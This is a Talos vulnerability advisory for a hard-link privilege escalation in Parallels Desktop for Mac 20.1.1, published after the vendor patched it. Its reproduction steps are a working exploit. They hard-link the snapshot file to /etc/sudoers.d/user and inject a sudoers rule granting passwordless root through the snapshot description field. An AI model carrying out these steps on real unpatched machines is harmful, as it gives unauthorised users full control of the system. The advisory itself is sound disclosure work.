Talos Vulnerability Report

SUMMARY

A privilege escalation vulnerability exists in the Snapshot functionality of Parallels Desktop for Mac version 20.1.1 (build 55740). When a snapshot of a virtual machine is taken, a root service writes to a file owned by a normal user. By using a hard link, an attacker can write to an arbitrary file, potentially leading to privilege escalation.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Parallels Desktop for Mac version 20.1.1 (55740)

PRODUCT URLS

Parallels Desktop for Mac - https://www.parallels.com/products/desktop/

CVSSv3 SCORE

7.8 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-62 - UNIX Hard Link

DETAILS

Parallels Desktop for Mac is an application that provides desktop virtualization, allowing users to run macOS, Windows, or Linux virtual machines on a Mac. It offers tools to create, configure, and manage virtual machines effectively.

prl_disp_service is a Parallels Desktop service that manages all communication between macOS, Parallels Desktop, and virtual machines. This service runs with root privileges.

A privilege escalation vulnerability exists when a snapshot of a virtual machine is taken. During this process, the prl_disp_service writes details about the snapshot, including the name and description, to the snapshot.xml file. These details can be controlled by a user. The snapshot.xml file is written to the VM directory, which is owned by a normal user. To exploit this, a user can replace the snapshot.xml file with a hard link to a file owned by root. Then, by taking a snapshot of the VM and injecting a payload via the name or description field. The prl_disp_service will follow the hard link and write the attacker-controlled payload to the root-owned file. This allows an attacker to write to arbitrary files owned by root, potentially performing privileged actions.

Steps to reproduce

1. Select a virtual machine (VM) that does not have any snapshots. If the selected VM has existing snapshots, delete all of them before proceeding.

2. Navigate to the selected VM’s folder and delete or move the Snapshots.xml file if it already exists.

    % cd Ubuntu_main.pvm
   
    % ls -la Snapshots.xml
    -rw-------  1 main  staff  784  3 Dec 12:01 Snapshots.xml
   
    % rm Snapshots.xml
   

3. Create a hard link to a file owned by root. In this case, create a hard link to the sudoers file.

    % ln  /etc/sudoers.d/user Snapshots.xml
   
    % cat Snapshots.xml
   
    % ls -la /etc/sudoers.d/user
    -rw-r--r--  2 root  wheel  0  3 Dec 12:36 /etc/sudoers.d/user
   
    % ls -la Snapshots.xml
    -rw-r--r--  3 root  wheel  0  3 Dec 12:36 Snapshots.xml
   

   Here, sudoers is empty.

4. Next, open the Control Center of the Parallels Desktop application. Right-click on the selected VM and choose Manage Snapshots. Then, click the New button to create a new snapshot. This will open a window. Enter the following text in the Description field and click the OK button to create the snapshot.

    A]]></Description>
   
    ALL ALL=(ALL) NOPASSWD:ALL
   
    #
   

Note that the Snapshot window will not display the new snapshot because the content of the snapshot.xml file is malformed. In this case, the payload ALL ALL=(ALL) NOPASSWD:ALL will allow any user to run the sudo command without a password.

Behind the scenes, the prl_disp_service will follow the hard link and write the payload to /etc/sudoers.d/user. The content is as follows:

cat /etc/sudoers.d/user
<?xml version="1.0" encoding="UTF-8"?>
<ParallelsSavedStates>
    <SavedStateItem state="poweroff" guid="">
        <Name></Name>
        <DateTime></DateTime>
        <Creator></Creator>
        <ScreenShot></ScreenShot>
        <Description><![CDATA[]]></Description>
        <AutoCreatedForLinkedClone>-1</AutoCreatedForLinkedClone>
        <SavedStateItem current="yes" state="poweroff" guid="{1d0de523-a240-4783-b1e9-77e181733475}">
            <Name>Snapshot 1</Name>
            <DateTime>2024-12-03 12:40:42</DateTime>
            <Creator></Creator>
            <ScreenShot></ScreenShot>
            <Description><![CDATA[A]]></Description>

ALL ALL=(ALL) NOPASSWD:ALL

#]]></Description>
            <AutoCreatedForLinkedClone>0</AutoCreatedForLinkedClone>
        </SavedStateItem>
    </SavedStateItem>
</ParallelsSavedStates>

Now, a normal user can run any command with sudo without needing a password.

sudo ls
/private/etc/sudoers.d/user:1:19: syntax error
<?xml version="1.0" encoding="UTF-8"?>
                  ^
/private/etc/sudoers.d/user:2:22: syntax error
<ParallelsSavedStates>
                     ^
/private/etc/sudoers.d/user:3:36: syntax error
    <SavedStateItem state="poweroff" guid="">
                                   ^
[...]
VRAM.dat               Ubuntu_main-0.hdd       config.pvs              
Snapshots               Ubuntu_main.app         config.pvs.backup      

Note that running any command with sudo will print the syntax error message because the sudoers file also contains invalid XML content.

By exploiting this vulnerability, a low-privilege user can potentially overwrite arbitrary files and escalate their privileges to those of a root user.

TIMELINE

2024-12-18 - Vendor Disclosure
2025-04-17 - Vendor Patch Release
2025-06-03 - Public Release